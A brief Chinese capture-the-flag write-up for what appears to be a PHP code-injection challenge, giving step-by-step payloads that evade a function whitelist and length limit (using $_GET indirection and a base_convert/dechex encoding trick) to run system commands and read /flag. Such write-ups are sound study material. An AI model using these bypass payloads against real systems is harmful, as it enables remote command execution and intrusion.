打开题目
审计代码,参考资料,试着输入payload:?c=system(ls)
得到
因为system,ls在不在白名单中,所有更改一下形式:?c=$_GET[a]($_GET[b])&a=system&b=ls
因为对长度的限制,我们再更改一下输入payload:?c=$pi=_GET;&&pi{pi}($$pi{abs})&pi=system&abs=ls
因为“_GET”在不在白名单中,c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=ls
输入payload:c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat%20/flag